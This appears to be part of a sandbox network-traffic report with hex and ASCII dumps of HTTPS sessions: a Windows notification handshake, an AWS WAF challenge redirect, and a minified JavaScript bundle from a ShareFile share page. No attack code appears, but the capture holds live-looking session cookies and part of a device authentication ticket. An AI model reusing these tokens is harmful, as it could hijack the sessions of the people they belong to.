                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC1247INData Raw: 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 6c 6f 61 64 69 6e 67 20 7b 0a 09 30 25 20 7b 0a 09 09 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 0a 09 7d 0a 09 31 30 30 25 20 7b 0a 09 09 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 36 30 64 65 67 29 3b 0a 09 7d 0a 20 20 7d 0a 0a 20 20 40 6b 65 79 66 72 61 6d 65 73 20 6c 6f 61 64 69 6e 67 20 7b 0a 09 20 20 30 25 20 7b 0a 09 09 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 0a 09 20 20 7d 0a 09 20 20 31 30 30 25 20 7b 0a 09 09 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 36 30 64 65 67 29 3b 0a 09 20 20 7d 0a 20 20 7d 0a 0a 20 20 2e 6c 6f 61 64 69 6e 67 2d 69 6e 2d 70 72 6f 67 72 65 73 73 20 7b 0a 09 2d 77 65 62 6b
                                                                                                                                                                                                                                                                                Data Ascii: @-webkit-keyframes loading {0% {transform: rotate(0deg);}100% {transform: rotate(60deg);} } @keyframes loading { 0% { transform: rotate(0deg); } 100% { transform: rotate(60deg); } } .loading-in-progress {-webk


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                3192.168.2.64971740.113.103.199443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 72 58 69 61 39 56 76 2f 79 55 32 2f 4d 48 54 6e 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 62 66 33 38 62 63 61 66 37 35 34 36 30 34 66 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: rXia9Vv/yU2/MHTn.1Context: 7bf38bcaf754604f
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 72 58 69 61 39 56 76 2f 79 55 32 2f 4d 48 54 6e 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 62 66 33 38 62 63 61 66 37 35 34 36 30 34 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 50 6a 71 53 6a 75 51 56 74 72 4e 52 63 59 30 59 46 70 69 2b 56 4a 45 53 6a 6b 2b 4a 66 4b 47 6b 4c 73 42 53 42 42 51 65 48 52 49 36 67 6f 5a 54 54 37 6b 51 6e 48 55 4b 37 6a 38 33 4b 68 51 38 51 6a 41 33 65 6b 71 49 76 2b 42 4e 62 39 50 4a 6a 49 64 69 37 42 65 52 37 46 2b 59 30 30 4d 34 52 51 33 49 72 65 53 71 7a 5a 63 58
                                                                                                                                                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: rXia9Vv/yU2/MHTn.2Context: 7bf38bcaf754604f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXPjqSjuQVtrNRcY0YFpi+VJESjk+JfKGkLsBSBBQeHRI6goZTT7kQnHUK7j83KhQ8QjA3ekqIv+BNb9PJjIdi7BeR7F+Y00M4RQ3IreSqzZcX
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 72 58 69 61 39 56 76 2f 79 55 32 2f 4d 48 54 6e 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 62 66 33 38 62 63 61 66 37 35 34 36 30 34 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                Data Ascii: BND 3 CON\WNS 0 197MS-CV: rXia9Vv/yU2/MHTn.3Context: 7bf38bcaf754604f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4b 4a 31 36 34 55 78 35 73 45 4b 73 36 4e 74 34 65 70 59 6a 46 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                Data Ascii: MS-CV: KJ164Ux5sEKs6Nt4epYjFQ.0Payload parsing failed.


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                4192.168.2.64971918.239.83.124432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC539OUTGET /0093b71e39a6/478ed03bbf12/challenge.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: 0093b71e39a6.us-east-1.sdk.awswaf.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC614INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:06 GMT
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: *
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                Cache-Control: max-age=86400
                                                                                                                                                                                                                                                                                Location: https://0093b71e39a6.11de9b12.us-east-1.token.awswaf.com/0093b71e39a6/478ed03bbf12/challenge.js
                                                                                                                                                                                                                                                                                X-Cache: FunctionGeneratedResponse from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 411234c039d8f1de63b7f2192e5e24d4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: N9YSPimgi1l4AnhIKbaRhZsGJ5rEi9AZJVR0vdY2PYw8TGFj82i5rg==


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                5192.168.2.64972113.248.193.2514432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC1249OUTGET /bundles/index.563cd3fc21b70465916a.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Referer: https://premierbb.sharefile.com/public/share/web-189361297164461c
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                Cookie: AWSALBTG=lEdzqxr9aneWEdtPlAkuF2UrNTolyncpmb2wqqDkjbOBAoP8c4PaLS/jAtZwkB8Mzf1Nj+rfDC6X+qf3LDYOSkYm9UndzsHbE2XEDLwt2PEwazqJdK5LcFYemqBQpdr5B7MU/rTb3ThP7KtCUbqTGsGCCNTcbWMNCw83EGB+sLTz; AWSALBTGCORS=lEdzqxr9aneWEdtPlAkuF2UrNTolyncpmb2wqqDkjbOBAoP8c4PaLS/jAtZwkB8Mzf1Nj+rfDC6X+qf3LDYOSkYm9UndzsHbE2XEDLwt2PEwazqJdK5LcFYemqBQpdr5B7MU/rTb3ThP7KtCUbqTGsGCCNTcbWMNCw83EGB+sLTz; AWSALB=GdC23EC+aMQbC10Zxya9vnuRSAQlRxphLPP4+S/czVR+v052yvmvfeKnWNRuGJS/YvZcOx0/QmNY8AI+A2U4zGmTb8IqNyXqmwCNWtN+1doo94zW1v+ximyleASy; AWSALBCORS=GdC23EC+aMQbC10Zxya9vnuRSAQlRxphLPP4+S/czVR+v052yvmvfeKnWNRuGJS/YvZcOx0/QmNY8AI+A2U4zGmTb8IqNyXqmwCNWtN+1doo94zW1v+ximyleASy
                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC1432INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:06 GMT
                                                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                                                Content-Length: 4673944
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTG=z6i4+RD+vbiAyO7VbenQ+LeAHbJRINEVO6hgziyHVxJkihs3VCGn3opExwU1MKxWvopG56oOrzkYh7GW7zcDT1TklOWmNxvoZ9tg075d0+2qvGT+N4mry2PC/CDQu1zBtWqd571o8Co8E1fvRGJo7Wi+tzCYgfM4mepzJsx/InCS; Expires=Wed, 16 Oct 2024 18:05:06 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTGCORS=z6i4+RD+vbiAyO7VbenQ+LeAHbJRINEVO6hgziyHVxJkihs3VCGn3opExwU1MKxWvopG56oOrzkYh7GW7zcDT1TklOWmNxvoZ9tg075d0+2qvGT+N4mry2PC/CDQu1zBtWqd571o8Co8E1fvRGJo7Wi+tzCYgfM4mepzJsx/InCS; Expires=Wed, 16 Oct 2024 18:05:06 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALB=nDKwoXw1z9J1+0Y1N7Z1peYKoxGl7dqJhYsosE9f5s+2zPwjvxIhT/Cp9vjM8l6gbVzeaG1VXowkRfBT26sizdMosXN7CVXaQYZrflNMwb1s3PIoNAz82PfVK0+P; Expires=Wed, 16 Oct 2024 18:05:06 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBCORS=nDKwoXw1z9J1+0Y1N7Z1peYKoxGl7dqJhYsosE9f5s+2zPwjvxIhT/Cp9vjM8l6gbVzeaG1VXowkRfBT26sizdMosXN7CVXaQYZrflNMwb1s3PIoNAz82PfVK0+P; Expires=Wed, 16 Oct 2024 18:05:06 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                                                                                                                ETag: "1db18773acb7698"
                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 07 Oct 2024 05:10:30 GMT
                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC8458INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 69 6e 64 65 78 2e 35 36 33 63 64 33 66 63 32 31 62 37 30 34 36 35 39 31 36 61 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 6f 3d 7b 36 31 32 34 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 69 4e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 78 7d 2c 52 5f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 2c 45 56 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 2c 65 7a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 7d 7d 29 3b 76 61 72 20
                                                                                                                                                                                                                                                                                Data Ascii: /*! For license information please see index.563cd3fc21b70465916a.js.LICENSE.txt */!function(){var e,t,n,r,o={61242:function(e,t,n){"use strict";n.d(t,{iN:function(){return x},R_:function(){return y},EV:function(){return E},ez:function(){return b}});var
                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC16384INData Raw: 61 72 28 22 2e 63 6f 6e 63 61 74 28 64 2c 22 29 22 29 7d 7d 29 29 2c 5b 69 2c 7a 28 72 2c 74 2c 7b 73 63 6f 70 65 3a 6e 75 6c 6c 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 73 63 6f 70 65 7d 29 5d 7d 2c 6a 3d 6e 28 38 34 31 30 29 2c 42 3d 28 30 2c 61 2e 5a 29 28 7b 7d 2c 75 29 2e 75 73 65 49 6e 73 65 72 74 69 6f 6e 45 66 66 65 63 74 2c 48 3d 42 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 42 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 29 2c 74 28 29 7d 29 2c 6e 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 73 2e 75 73 65 4d 65 6d 6f 28 65 2c 6e 29 2c 28 30 2c 6a 2e 5a 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 28 21 30 29 7d 29 2c 6e 29 7d 2c 55 3d 76 6f 69 64 20 30 21 3d 3d 28
                                                                                                                                                                                                                                                                                Data Ascii: ar(".concat(d,")")}})),[i,z(r,t,{scope:null==n?void 0:n.scope})]},j=n(8410),B=(0,a.Z)({},u).useInsertionEffect,H=B?function(e,t,n){return B((function(){return e(),t()}),n)}:function(e,t,n){s.useMemo(e,n),(0,j.Z)((function(){return t(!0)}),n)},U=void 0!==(
                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC16384INData Raw: 34 39 34 32 29 2c 61 3d 6e 28 34 35 39 38 37 29 2c 6c 3d 6e 28 36 37 32 39 34 29 2c 63 3d 6e 28 39 33 39 36 37 29 2c 73 3d 6e 2e 6e 28 63 29 2c 75 3d 6e 28 34 32 35 35 30 29 2c 64 3d 6e 28 36 33 30 31 37 29 2c 66 3d 6e 28 34 31 37 35 35 29 2c 70 3d 5b 22 63 6c 61 73 73 4e 61 6d 65 22 2c 22 63 6f 6d 70 6f 6e 65 6e 74 22 2c 22 76 69 65 77 42 6f 78 22 2c 22 73 70 69 6e 22 2c 22 72 6f 74 61 74 65 22 2c 22 74 61 62 49 6e 64 65 78 22 2c 22 6f 6e 43 6c 69 63 6b 22 2c 22 63 68 69 6c 64 72 65 6e 22 5d 2c 6d 3d 6c 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 2e 63 6c 61 73 73 4e 61 6d 65 2c 63 3d 65 2e 63 6f 6d 70 6f 6e 65 6e 74 2c 6d 3d 65 2e 76 69 65 77 42 6f 78 2c 68 3d 65 2e 73 70 69 6e 2c 76 3d 65 2e 72
                                                                                                                                                                                                                                                                                Data Ascii: 4942),a=n(45987),l=n(67294),c=n(93967),s=n.n(c),u=n(42550),d=n(63017),f=n(41755),p=["className","component","viewBox","spin","rotate","tabIndex","onClick","children"],m=l.forwardRef((function(e,t){var n=e.className,c=e.component,m=e.viewBox,h=e.spin,v=e.r
                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC16384INData Raw: 61 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 20 32 34 3a 74 3d 22 31 31 70 78 22 2c 6e 3d 22 31 30 70 78 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 30 3a 74 3d 22 31 32 70 78 22 2c 6e 3d 22 31 32 70 78 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 35 30 3a 74 3d 22 32 34 70 78 22 2c 6e 3d 22 31 35 70 78 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 37 35 3a 74 3d 22 33 32 70 78 22 2c 6e 3d 22 32 30 70 78 22 7d 72 65 74 75 72 6e 7b 70 78 53 69 7a 65 3a 22 22 2e 63 6f 6e 63 61 74 28 65 2c 22 70 78 22 29 2c 66 6f 6e 74 53 69 7a 65 3a 74 2c 73 70 61 63 69 6e 67 3a 6e 7d 7d 28 65 2e 73 69 7a 65 29 2c 6c 3d 65 2e 68 69 64 65 41 76 61 74 61 72 7c 7c 28 74 3d 65 2e 73 72 63 2c 6e 3d 74 2e 73 75 62 73 74 72 28 74 2e
                                                                                                                                                                                                                                                                                Data Ascii: a=function(e){var t,n;switch(e){case 24:t="11px",n="10px";break;case 30:t="12px",n="12px";break;case 50:t="24px",n="15px";break;case 75:t="32px",n="20px"}return{pxSize:"".concat(e,"px"),fontSize:t,spacing:n}}(e.size),l=e.hideAvatar||(t=e.src,n=t.substr(t.
                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC16384INData Raw: 29 28 28 30 2c 4c 2e 5a 29 28 6e 29 2c 22 5f 72 6f 77 53 74 6f 70 49 6e 64 65 78 22 2c 76 6f 69 64 20 30 29 2c 28 30 2c 70 2e 5a 29 28 28 30 2c 4c 2e 5a 29 28 6e 29 2c 22 5f 72 65 6e 64 65 72 65 64 43 6f 6c 75 6d 6e 53 74 61 72 74 49 6e 64 65 78 22 2c 30 29 2c 28 30 2c 70 2e 5a 29 28 28 30 2c 4c 2e 5a 29 28 6e 29 2c 22 5f 72 65 6e 64 65 72 65 64 43 6f 6c 75 6d 6e 53 74 6f 70 49 6e 64 65 78 22 2c 30 29 2c 28 30 2c 70 2e 5a 29 28 28 30 2c 4c 2e 5a 29 28 6e 29 2c 22 5f 72 65 6e 64 65 72 65 64 52 6f 77 53 74 61 72 74 49 6e 64 65 78 22 2c 30 29 2c 28 30 2c 70 2e 5a 29 28 28 30 2c 4c 2e 5a 29 28 6e 29 2c 22 5f 72 65 6e 64 65 72 65 64 52 6f 77 53 74 6f 70 49 6e 64 65 78 22 2c 30 29 2c 28 30 2c 70 2e 5a 29 28 28 30 2c 4c 2e 5a 29 28 6e 29 2c 22 5f 69 6e 69 74 69
                                                                                                                                                                                                                                                                                Data Ascii: )((0,L.Z)(n),"_rowStopIndex",void 0),(0,p.Z)((0,L.Z)(n),"_renderedColumnStartIndex",0),(0,p.Z)((0,L.Z)(n),"_renderedColumnStopIndex",0),(0,p.Z)((0,L.Z)(n),"_renderedRowStartIndex",0),(0,p.Z)((0,L.Z)(n),"_renderedRowStopIndex",0),(0,p.Z)((0,L.Z)(n),"_initi
                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC16384INData Raw: 61 74 65 64 43 6f 6c 75 6d 6e 53 69 7a 65 28 65 29 2c 63 65 6c 6c 53 69 7a 65 47 65 74 74 65 72 3a 74 2e 5f 77 72 61 70 53 69 7a 65 47 65 74 74 65 72 28 65 2e 63 6f 6c 75 6d 6e 57 69 64 74 68 29 7d 29 2c 61 2e 72 6f 77 53 69 7a 65 41 6e 64 50 6f 73 69 74 69 6f 6e 4d 61 6e 61 67 65 72 2e 63 6f 6e 66 69 67 75 72 65 28 7b 63 65 6c 6c 43 6f 75 6e 74 3a 65 2e 72 6f 77 43 6f 75 6e 74 2c 65 73 74 69 6d 61 74 65 64 43 65 6c 6c 53 69 7a 65 3a 74 2e 5f 67 65 74 45 73 74 69 6d 61 74 65 64 52 6f 77 53 69 7a 65 28 65 29 2c 63 65 6c 6c 53 69 7a 65 47 65 74 74 65 72 3a 74 2e 5f 77 72 61 70 53 69 7a 65 47 65 74 74 65 72 28 65 2e 72 6f 77 48 65 69 67 68 74 29 7d 29 2c 30 21 3d 3d 61 2e 70 72 65 76 43 6f 6c 75 6d 6e 43 6f 75 6e 74 26 26 30 21 3d 3d 61 2e 70 72 65 76 52 6f
                                                                                                                                                                                                                                                                                Data Ascii: atedColumnSize(e),cellSizeGetter:t._wrapSizeGetter(e.columnWidth)}),a.rowSizeAndPositionManager.configure({cellCount:e.rowCount,estimatedCellSize:t._getEstimatedRowSize(e),cellSizeGetter:t._wrapSizeGetter(e.rowHeight)}),0!==a.prevColumnCount&&0!==a.prevRo
                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC16384INData Raw: 65 69 67 68 74 2c 75 3d 63 2e 77 69 64 74 68 3b 73 3d 3d 3d 74 2e 67 65 74 48 65 69 67 68 74 28 6c 2c 6f 29 26 26 75 3d 3d 3d 74 2e 67 65 74 57 69 64 74 68 28 6c 2c 6f 29 7c 7c 28 74 2e 73 65 74 28 6c 2c 6f 2c 75 2c 73 29 2c 69 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 65 63 6f 6d 70 75 74 65 47 72 69 64 53 69 7a 65 26 26 69 2e 72 65 63 6f 6d 70 75 74 65 47 72 69 64 53 69 7a 65 28 7b 63 6f 6c 75 6d 6e 49 6e 64 65 78 3a 6f 2c 72 6f 77 49 6e 64 65 78 3a 6c 7d 29 29 7d 29 29 2c 28 30 2c 70 2e 5a 29 28 28 30 2c 4c 2e 5a 29 28 6e 29 2c 22 5f 72 65 67 69 73 74 65 72 43 68 69 6c 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 21 65 7c 7c 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 6c 65 6d 65 6e 74 7c 7c 63 6f 6e 73 6f 6c 65 2e 77 61
                                                                                                                                                                                                                                                                                Data Ascii: eight,u=c.width;s===t.getHeight(l,o)&&u===t.getWidth(l,o)||(t.set(l,o,u,s),i&&"function"==typeof i.recomputeGridSize&&i.recomputeGridSize({columnIndex:o,rowIndex:l}))})),(0,p.Z)((0,L.Z)(n),"_registerChild",(function(e){!e||e instanceof Element||console.wa
                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC16384INData Raw: 72 65 64 53 74 6f 70 49 6e 64 65 78 3d 6e 2c 74 68 69 73 2e 5f 64 6f 53 74 75 66 66 28 74 2c 6e 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 64 6f 53 74 75 66 66 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 74 68 69 73 2c 6f 3d 74 68 69 73 2e 70 72 6f 70 73 2c 69 3d 6f 2e 69 73 52 6f 77 4c 6f 61 64 65 64 2c 61 3d 6f 2e 6d 69 6e 69 6d 75 6d 42 61 74 63 68 53 69 7a 65 2c 63 3d 6f 2e 72 6f 77 43 6f 75 6e 74 2c 73 3d 6f 2e 74 68 72 65 73 68 6f 6c 64 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 69 73 52 6f 77 4c 6f 61 64 65 64 2c 6e 3d 65 2e 6d 69 6e 69 6d 75 6d 42 61 74 63 68 53 69 7a 65 2c 72 3d 65 2e 72 6f 77 43 6f 75 6e 74 2c 6f 3d 65 2e 73 74 61 72 74 49 6e 64 65 78 2c 69 3d 65 2e 73 74
                                                                                                                                                                                                                                                                                Data Ascii: redStopIndex=n,this._doStuff(t,n)}},{key:"_doStuff",value:function(e,t){var n,r=this,o=this.props,i=o.isRowLoaded,a=o.minimumBatchSize,c=o.rowCount,s=o.threshold,u=function(e){for(var t=e.isRowLoaded,n=e.minimumBatchSize,r=e.rowCount,o=e.startIndex,i=e.st
